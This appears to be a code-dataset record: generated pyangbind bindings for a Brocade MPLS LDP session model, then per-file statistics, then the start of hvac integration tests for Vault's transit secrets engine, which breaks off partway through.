def _get_addresses(self):
"""
Getter method for addresses, mapped from YANG variable /mpls_state/ldp/ldp_session/addresses (string)
YANG Description: address list
"""
return self.__addresses
def _set_addresses(self, v, load=False):
"""
Setter method for addresses, mapped from YANG variable /mpls_state/ldp/ldp_session/addresses (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_addresses is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_addresses() directly.
YANG Description: address list
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="addresses", rest_name="addresses", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """addresses must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="addresses", rest_name="addresses", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__addresses = t
if hasattr(self, '_set'):
self._set()
def _unset_addresses(self):
self.__addresses = YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="addresses", rest_name="addresses", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_session_ldp_stats(self):
"""
Getter method for session_ldp_stats, mapped from YANG variable /mpls_state/ldp/ldp_session/session_ldp_stats (container)
YANG Description: Session LDP stats
"""
return self.__session_ldp_stats
def _set_session_ldp_stats(self, v, load=False):
"""
Setter method for session_ldp_stats, mapped from YANG variable /mpls_state/ldp/ldp_session/session_ldp_stats (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_session_ldp_stats is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_session_ldp_stats() directly.
YANG Description: Session LDP stats
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=session_ldp_stats.session_ldp_stats, is_container='container', presence=False, yang_name="session-ldp-stats", rest_name="session-ldp-stats", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-session-ldp-stats', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """session_ldp_stats must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=session_ldp_stats.session_ldp_stats, is_container='container', presence=False, yang_name="session-ldp-stats", rest_name="session-ldp-stats", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-session-ldp-stats', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__session_ldp_stats = t
if hasattr(self, '_set'):
self._set()
def _unset_session_ldp_stats(self):
self.__session_ldp_stats = YANGDynClass(base=session_ldp_stats.session_ldp_stats, is_container='container', presence=False, yang_name="session-ldp-stats", rest_name="session-ldp-stats", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-session-ldp-stats', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_filtered_fecs_in(self):
"""
Getter method for filtered_fecs_in, mapped from YANG variable /mpls_state/ldp/ldp_session/filtered_fecs_in (list)
"""
return self.__filtered_fecs_in
def _set_filtered_fecs_in(self, v, load=False):
"""
Setter method for filtered_fecs_in, mapped from YANG variable /mpls_state/ldp/ldp_session/filtered_fecs_in (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_filtered_fecs_in is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_filtered_fecs_in() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("fec_addr",filtered_fecs_in.filtered_fecs_in, yang_name="filtered-fecs-in", rest_name="filtered-fecs-in", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='fec-addr', extensions={u'tailf-common': {u'callpoint': u'mpls-filtered-fecs-filtered-fecs-in-1'}}), is_container='list', yang_name="filtered-fecs-in", rest_name="filtered-fecs-in", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-filtered-fecs-filtered-fecs-in-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """filtered_fecs_in must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("fec_addr",filtered_fecs_in.filtered_fecs_in, yang_name="filtered-fecs-in", rest_name="filtered-fecs-in", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='fec-addr', extensions={u'tailf-common': {u'callpoint': u'mpls-filtered-fecs-filtered-fecs-in-1'}}), is_container='list', yang_name="filtered-fecs-in", rest_name="filtered-fecs-in", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-filtered-fecs-filtered-fecs-in-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)""",
})
self.__filtered_fecs_in = t
if hasattr(self, '_set'):
self._set()
def _unset_filtered_fecs_in(self):
self.__filtered_fecs_in = YANGDynClass(base=YANGListType("fec_addr",filtered_fecs_in.filtered_fecs_in, yang_name="filtered-fecs-in", rest_name="filtered-fecs-in", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='fec-addr', extensions={u'tailf-common': {u'callpoint': u'mpls-filtered-fecs-filtered-fecs-in-1'}}), is_container='list', yang_name="filtered-fecs-in", rest_name="filtered-fecs-in", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-filtered-fecs-filtered-fecs-in-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
def _get_filtered_fecs_out(self):
"""
Getter method for filtered_fecs_out, mapped from YANG variable /mpls_state/ldp/ldp_session/filtered_fecs_out (list)
"""
return self.__filtered_fecs_out
def _set_filtered_fecs_out(self, v, load=False):
"""
Setter method for filtered_fecs_out, mapped from YANG variable /mpls_state/ldp/ldp_session/filtered_fecs_out (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_filtered_fecs_out is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_filtered_fecs_out() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("fec_addr",filtered_fecs_out.filtered_fecs_out, yang_name="filtered-fecs-out", rest_name="filtered-fecs-out", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='fec-addr', extensions={u'tailf-common': {u'callpoint': u'mpls-filtered-fecs-filtered-fecs-out-1'}}), is_container='list', yang_name="filtered-fecs-out", rest_name="filtered-fecs-out", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-filtered-fecs-filtered-fecs-out-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """filtered_fecs_out must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("fec_addr",filtered_fecs_out.filtered_fecs_out, yang_name="filtered-fecs-out", rest_name="filtered-fecs-out", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='fec-addr', extensions={u'tailf-common': {u'callpoint': u'mpls-filtered-fecs-filtered-fecs-out-1'}}), is_container='list', yang_name="filtered-fecs-out", rest_name="filtered-fecs-out", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-filtered-fecs-filtered-fecs-out-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)""",
})
self.__filtered_fecs_out = t
if hasattr(self, '_set'):
self._set()
def _unset_filtered_fecs_out(self):
self.__filtered_fecs_out = YANGDynClass(base=YANGListType("fec_addr",filtered_fecs_out.filtered_fecs_out, yang_name="filtered-fecs-out", rest_name="filtered-fecs-out", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='fec-addr', extensions={u'tailf-common': {u'callpoint': u'mpls-filtered-fecs-filtered-fecs-out-1'}}), is_container='list', yang_name="filtered-fecs-out", rest_name="filtered-fecs-out", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-filtered-fecs-filtered-fecs-out-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
peer_ldp_id = __builtin__.property(_get_peer_ldp_id)
peer_lblspc_id = __builtin__.property(_get_peer_lblspc_id)
state = __builtin__.property(_get_state)
adjacency = __builtin__.property(_get_adjacency)
role = __builtin__.property(_get_role)
max_hold = __builtin__.property(_get_max_hold)
time_left = __builtin__.property(_get_time_left)
session_status = __builtin__.property(_get_session_status)
local_ldp_id = __builtin__.property(_get_local_ldp_id)
local_lblspc_id = __builtin__.property(_get_local_lblspc_id)
next_keepalive = __builtin__.property(_get_next_keepalive)
entity_index = __builtin__.property(_get_entity_index)
targeted_adj_added = __builtin__.property(_get_targeted_adj_added)
is_retry = __builtin__.property(_get_is_retry)
next_retry = __builtin__.property(_get_next_retry)
keepalive_interval = __builtin__.property(_get_keepalive_interval)
local_keepalive_timeout = __builtin__.property(_get_local_keepalive_timeout)
peer_proposed_keepalive_timeout = __builtin__.property(_get_peer_proposed_keepalive_timeout)
session_up_time = __builtin__.property(_get_session_up_time)
md5_auth_key = __builtin__.property(_get_md5_auth_key)
tcp_conn_local = __builtin__.property(_get_tcp_conn_local)
tcp_conn_remote = __builtin__.property(_get_tcp_conn_remote)
tcp_state = __builtin__.property(_get_tcp_state)
num_fecs_received_from_peer = __builtin__.property(_get_num_fecs_received_from_peer)
num_fecs_installed_from_peer = __builtin__.property(_get_num_fecs_installed_from_peer)
is_fecs_pending_uninstall = __builtin__.property(_get_is_fecs_pending_uninstall)
num_fecs_filtered_out = __builtin__.property(_get_num_fecs_filtered_out)
num_fecs_filtered_in = __builtin__.property(_get_num_fecs_filtered_in)
filter_prefix_list_name = __builtin__.property(_get_filter_prefix_list_name)
filter_prefix_list_exists = __builtin__.property(_get_filter_prefix_list_exists)
is_only_gr_valid = __builtin__.property(_get_is_only_gr_valid)
gr_enabled = __builtin__.property(_get_gr_enabled)
peer_reconnect_time = __builtin__.property(_get_peer_reconnect_time)
peer_recovery_time = __builtin__.property(_get_peer_recovery_time)
reconnect_time_in_use = __builtin__.property(_get_reconnect_time_in_use)
reconnect_time_remaining = __builtin__.property(_get_reconnect_time_remaining)
recovery_time_in_use = __builtin__.property(_get_recovery_time_in_use)
recovery_time_remaining = __builtin__.property(_get_recovery_time_remaining)
gr_state = __builtin__.property(_get_gr_state)
local_eol_unrecognized_notification = __builtin__.property(_get_local_eol_unrecognized_notification)
remote_eol_unrecognized_notification = __builtin__.property(_get_remote_eol_unrecognized_notification)
does_session_support_eol = __builtin__.property(_get_does_session_support_eol)
local_state = __builtin__.property(_get_local_state)
remote_state = __builtin__.property(_get_remote_state)
eol_notification_time = __builtin__.property(_get_eol_notification_time)
eol_notification_time_remaining = __builtin__.property(_get_eol_notification_time_remaining)
eol_tx_label_silence_time = __builtin__.property(_get_eol_tx_label_silence_time)
eol_tx_label_silence_time_remaining = __builtin__.property(_get_eol_tx_label_silence_time_remaining)
eol_rx_label_silence_time = __builtin__.property(_get_eol_rx_label_silence_time)
eol_rx_label_silence_time_remaining = __builtin__.property(_get_eol_rx_label_silence_time_remaining)
filtered = __builtin__.property(_get_filtered)
interfaces = __builtin__.property(_get_interfaces)
addresses = __builtin__.property(_get_addresses)
session_ldp_stats = __builtin__.property(_get_session_ldp_stats)
filtered_fecs_in = __builtin__.property(_get_filtered_fecs_in)
filtered_fecs_out = __builtin__.property(_get_filtered_fecs_out)
_pyangbind_elements = {'peer_ldp_id': peer_ldp_id, 'peer_lblspc_id': peer_lblspc_id, 'state': state, 'adjacency': adjacency, 'role': role, 'max_hold': max_hold, 'time_left': time_left, 'session_status': session_status, 'local_ldp_id': local_ldp_id, 'local_lblspc_id': local_lblspc_id, 'next_keepalive': next_keepalive, 'entity_index': entity_index, 'targeted_adj_added': targeted_adj_added, 'is_retry': is_retry, 'next_retry': next_retry, 'keepalive_interval': keepalive_interval, 'local_keepalive_timeout': local_keepalive_timeout, 'peer_proposed_keepalive_timeout': peer_proposed_keepalive_timeout, 'session_up_time': session_up_time, 'md5_auth_key': md5_auth_key, 'tcp_conn_local': tcp_conn_local, 'tcp_conn_remote': tcp_conn_remote, 'tcp_state': tcp_state, 'num_fecs_received_from_peer': num_fecs_received_from_peer, 'num_fecs_installed_from_peer': num_fecs_installed_from_peer, 'is_fecs_pending_uninstall': is_fecs_pending_uninstall, 'num_fecs_filtered_out': num_fecs_filtered_out, 'num_fecs_filtered_in': num_fecs_filtered_in, 'filter_prefix_list_name': filter_prefix_list_name, 'filter_prefix_list_exists': filter_prefix_list_exists, 'is_only_gr_valid': is_only_gr_valid, 'gr_enabled': gr_enabled, 'peer_reconnect_time': peer_reconnect_time, 'peer_recovery_time': peer_recovery_time, 'reconnect_time_in_use': reconnect_time_in_use, 'reconnect_time_remaining': reconnect_time_remaining, 'recovery_time_in_use': recovery_time_in_use, 'recovery_time_remaining': recovery_time_remaining, 'gr_state': gr_state, 'local_eol_unrecognized_notification': local_eol_unrecognized_notification, 'remote_eol_unrecognized_notification': remote_eol_unrecognized_notification, 'does_session_support_eol': does_session_support_eol, 'local_state': local_state, 'remote_state': remote_state, 'eol_notification_time': eol_notification_time, 'eol_notification_time_remaining': eol_notification_time_remaining, 'eol_tx_label_silence_time': eol_tx_label_silence_time, 'eol_tx_label_silence_time_remaining': eol_tx_label_silence_time_remaining, 'eol_rx_label_silence_time': eol_rx_label_silence_time, 'eol_rx_label_silence_time_remaining': eol_rx_label_silence_time_remaining, 'filtered': filtered, 'interfaces': interfaces, 'addresses': addresses, 'session_ldp_stats': session_ldp_stats, 'filtered_fecs_in': filtered_fecs_in, 'filtered_fecs_out': filtered_fecs_out, }
| 75.226306
| 2,352
| 0.759621
| 23,208
| 169,861
| 5.254481
| 0.012668
| 0.039198
| 0.05281
| 0.034245
| 0.934389
| 0.909698
| 0.895364
| 0.883834
| 0.873231
| 0.863054
| 0
| 0.011291
| 0.116248
| 169,861
| 2,257
| 2,353
| 75.259637
| 0.801059
| 0.183073
| 0
| 0.532218
| 0
| 0.046862
| 0.387596
| 0.244039
| 0
| 0
| 0
| 0
| 0
| 1
| 0.143096
| false
| 0
| 0.009205
| 0
| 0.25523
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58290ef190b041572feb668f1c5360a415be9d9e
| 30,070
|
py
|
Python
|
tests/integration_tests/api/secrets_engines/test_transit.py
|
ddeka2910/hvac
|
80cf3950157bf003ee6622e6db84bb9d6c90e5f1
|
[
"Apache-2.0"
] | 1
|
2020-12-14T04:01:10.000Z
|
2020-12-14T04:01:10.000Z
|
tests/integration_tests/api/secrets_engines/test_transit.py
|
TerryHowe/hvac
|
a6b7f904bfaba3c1133ccc7fa5a0cff0d29340c7
|
[
"Apache-2.0"
] | 2
|
2019-07-08T03:09:38.000Z
|
2021-07-08T18:17:51.000Z
|
tests/integration_tests/api/secrets_engines/test_transit.py
|
TerryHowe/hvac
|
a6b7f904bfaba3c1133ccc7fa5a0cff0d29340c7
|
[
"Apache-2.0"
] | null | null | null |
import logging
from unittest import TestCase
from unittest import skipIf
from parameterized import parameterized, param
from hvac import exceptions
from tests import utils
from tests.utils.hvac_integration_test_case import HvacIntegrationTestCase
class TestTransit(HvacIntegrationTestCase, TestCase):
TEST_MOUNT_POINT = 'transit-integration-test'
def setUp(self):
super(TestTransit, self).setUp()
self.client.enable_secret_backend(
backend_type='transit',
mount_point=self.TEST_MOUNT_POINT,
)
def tearDown(self):
self.client.disable_secret_backend(mount_point=self.TEST_MOUNT_POINT)
super(TestTransit, self).tearDown()
@parameterized.expand([
param(
'success',
),
])
def test_create_key(self, label, raises=False, exception_message=''):
key_name = 'testkey'
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.create_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
create_key_response = self.client.secrets.transit.create_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('create_key_response: %s' % create_key_response)
self.assertEqual(
first=bool(create_key_response),
second=True,
)
@parameterized.expand([
param(
'success',
),
])
def test_read_key(self, label, raises=False, exception_message=''):
key_name = 'testkey'
create_key_response = self.client.secrets.transit.create_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('create_key_response: %s' % create_key_response)
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.read_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
read_key_response = self.client.secrets.transit.read_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('read_key_response: %s' % read_key_response)
self.assertEqual(
first=read_key_response['data']['name'],
second=key_name,
)
@parameterized.expand([
param(
'success',
),
])
def test_list_keys(self, label, raises=False, exception_message=''):
key_name = 'testkey'
create_key_response = self.client.secrets.transit.create_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('create_key_response: %s' % create_key_response)
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.list_keys(
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
list_keys_response = self.client.secrets.transit.list_keys(
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('list_keys_response: %s' % list_keys_response)
self.assertEqual(
first=list_keys_response['data']['keys'],
second=[key_name],
)
@parameterized.expand([
param(
'success',
),
])
def test_delete_key(self, label, raises=False, exception_message=''):
key_name = 'testkey'
create_key_response = self.client.secrets.transit.create_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('create_key_response: %s' % create_key_response)
update_key_configuration_response = self.client.secrets.transit.update_key_configuration(
name=key_name,
deletion_allowed=True,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('update_key_configuration_response: %s' % update_key_configuration_response)
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.delete_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
delete_key_response = self.client.secrets.transit.delete_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('delete_key_response: %s' % delete_key_response)
self.assertEqual(
first=bool(delete_key_response),
second=True,
)
@parameterized.expand([
param(
'success',
),
])
def test_rotate_key(self, label, raises=False, exception_message=''):
key_name = 'testkey'
create_key_response = self.client.secrets.transit.create_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('create_key_response: %s' % create_key_response)
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.rotate_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
rotate_key_response = self.client.secrets.transit.rotate_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('rotate_key_response: %s' % rotate_key_response)
self.assertEqual(
first=bool(rotate_key_response),
second=True,
)
@parameterized.expand([
param(
'success',
),
param(
'invalid key type',
key_type='kitty-cat-key',
raises=exceptions.ParamValidationError,
exception_message='invalid key_type argument provided',
),
])
def test_export_key(self, label, key_type='hmac-key', raises=False, exception_message=''):
key_name = 'testkey'
create_key_response = self.client.secrets.transit.create_key(
name=key_name,
exportable=True,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('create_key_response: %s' % create_key_response)
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.export_key(
name=key_name,
key_type=key_type,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
export_key_response = self.client.secrets.transit.export_key(
name=key_name,
key_type=key_type,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('export_key_response: %s' % export_key_response)
self.assertEqual(
first=len(export_key_response['data']['keys']),
second=1,
)
self.assertEqual(
first=export_key_response['data']['name'],
second=key_name,
)
@parameterized.expand([
param(
'success',
),
])
def test_encrypt_data(self, label, plaintext='hi itsame hvac', raises=False, exception_message=''):
key_name = 'testkey'
plaintext = utils.base64ify(plaintext)
create_key_response = self.client.secrets.transit.create_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('create_key_response: %s' % create_key_response)
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.encrypt_data(
name=key_name,
plaintext=plaintext,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
encrypt_data_response = self.client.secrets.transit.encrypt_data(
name=key_name,
plaintext=plaintext,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('encrypt_data_response: %s' % encrypt_data_response)
self.assertIn(
member='ciphertext',
container=encrypt_data_response['data'],
)
@parameterized.expand([
param(
'success',
),
])
def test_decrypt_data(self, label, plaintext='hi itsame hvac', raises=False, exception_message=''):
key_name = 'testkey'
plaintext = utils.base64ify(plaintext)
create_key_response = self.client.secrets.transit.create_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('create_key_response: %s' % create_key_response)
encrypt_data_response = self.client.secrets.transit.encrypt_data(
name=key_name,
plaintext=plaintext,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('encrypt_data_response: %s' % encrypt_data_response)
ciphertext = encrypt_data_response['data']['ciphertext']
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.decrypt_data(
name=key_name,
ciphertext=ciphertext,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
decrypt_data_response = self.client.secrets.transit.decrypt_data(
name=key_name,
ciphertext=ciphertext,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('decrypt_data_response: %s' % decrypt_data_response)
self.assertIn(
member=plaintext,
container=decrypt_data_response['data']['plaintext'],
)
@parameterized.expand([
param(
'success',
),
])
def test_rewrap_data(self, label, plaintext='hi itsame hvac', raises=False, exception_message=''):
key_name = 'testkey'
plaintext = utils.base64ify(plaintext)
create_key_response = self.client.secrets.transit.create_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('create_key_response: %s' % create_key_response)
encrypt_data_response = self.client.secrets.transit.encrypt_data(
name=key_name,
plaintext=plaintext,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('encrypt_data_response: %s' % encrypt_data_response)
ciphertext = encrypt_data_response['data']['ciphertext']
rotate_key_response = self.client.secrets.transit.rotate_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('rotate_key_response: %s' % rotate_key_response)
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.rewrap_data(
name=key_name,
ciphertext=ciphertext,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
rewrap_data_response = self.client.secrets.transit.rewrap_data(
name=key_name,
ciphertext=ciphertext,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('rewrap_data_response: %s' % rewrap_data_response)
self.assertIn(
member='ciphertext',
container=rewrap_data_response['data'],
)
@parameterized.expand([
param(
'success',
),
param(
'invalid key type',
key_type='kitty-cat-key',
raises=exceptions.ParamValidationError,
exception_message='invalid key_type argument provided',
),
])
def test_generate_data_key(self, label, key_type='plaintext', raises=False, exception_message=''):
key_name = 'testkey'
create_key_response = self.client.secrets.transit.create_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('create_key_response: %s' % create_key_response)
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.generate_data_key(
name=key_name,
key_type=key_type,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
gen_data_key_response = self.client.secrets.transit.generate_data_key(
name=key_name,
key_type=key_type,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('gen_data_key_response: %s' % gen_data_key_response)
self.assertIn(
member='ciphertext',
container=gen_data_key_response['data'],
)
@parameterized.expand([
param(
'success',
),
])
def test_generate_random_bytes(self, label, n_bytes=32, raises=False, exception_message=''):
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.generate_random_bytes(
n_bytes=n_bytes,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
gen_bytes_response = self.client.secrets.transit.generate_random_bytes(
n_bytes=n_bytes,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('gen_data_key_response: %s' % gen_bytes_response)
self.assertIn(
member='random_bytes',
container=gen_bytes_response['data'],
)
@parameterized.expand([
param(
'success',
),
param(
'invalid algorithm',
algorithm='meow2-256',
raises=exceptions.ParamValidationError,
exception_message='invalid algorithm argument provided',
),
param(
'invalid output_format',
output_format='kitty64',
raises=exceptions.ParamValidationError,
exception_message='invalid output_format argument provided',
),
])
def test_hash_data(self, label, hash_input='hash this ish', algorithm='sha2-256', output_format='hex', raises=False, exception_message=''):
hash_input = utils.base64ify(hash_input)
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.hash_data(
hash_input=hash_input,
algorithm=algorithm,
output_format=output_format,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
hash_data_response = self.client.secrets.transit.hash_data(
hash_input=hash_input,
algorithm=algorithm,
output_format=output_format,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('hash_data_response: %s' % hash_data_response)
self.assertIn(
member='sum',
container=hash_data_response['data'],
)
@parameterized.expand([
param(
'success',
),
param(
'invalid algorithm',
algorithm='meow2-256',
raises=exceptions.ParamValidationError,
exception_message='invalid algorithm argument provided',
),
])
def test_generate_hmac(self, label, hash_input='hash this ish', algorithm='sha2-256', raises=False, exception_message=''):
hash_input = utils.base64ify(hash_input)
key_name = 'testkey'
create_key_response = self.client.secrets.transit.create_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('create_key_response: %s' % create_key_response)
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.generate_hmac(
name=key_name,
hash_input=hash_input,
algorithm=algorithm,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
generate_hmac_response = self.client.secrets.transit.generate_hmac(
name=key_name,
hash_input=hash_input,
algorithm=algorithm,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('generate_hmac_response: %s' % generate_hmac_response)
self.assertIn(
member='hmac',
container=generate_hmac_response['data'],
)
@parameterized.expand([
param(
'success',
),
param(
'invalid algorithm',
hash_algorithm='meow2-256',
raises=exceptions.ParamValidationError,
exception_message='invalid hash_algorithm argument provided',
),
param(
'invalid signature_algorithm',
signature_algorithm='pre-shared kitty cats',
raises=exceptions.ParamValidationError,
exception_message='invalid signature_algorithm argument provided',
),
])
def test_sign_data(self, label, hash_input='hash this ish', hash_algorithm='sha2-256', signature_algorithm='pss',
raises=False, exception_message=''):
hash_input = utils.base64ify(hash_input)
key_name = 'testkey'
key_type = 'ed25519'
create_key_response = self.client.secrets.transit.create_key(
name=key_name,
key_type=key_type,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('create_key_response: %s' % create_key_response)
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.sign_data(
name=key_name,
hash_input=hash_input,
hash_algorithm=hash_algorithm,
signature_algorithm=signature_algorithm,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
sign_data_response = self.client.secrets.transit.sign_data(
name=key_name,
hash_input=hash_input,
hash_algorithm=hash_algorithm,
signature_algorithm=signature_algorithm,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('sign_data_response: %s' % sign_data_response)
self.assertIn(
member='signature',
container=sign_data_response['data'],
)
@parameterized.expand([
param(
'success',
),
param(
'invalid algorithm',
hash_algorithm='meow2-256',
raises=exceptions.ParamValidationError,
exception_message='invalid hash_algorithm argument provided',
),
param(
'invalid signature_algorithm',
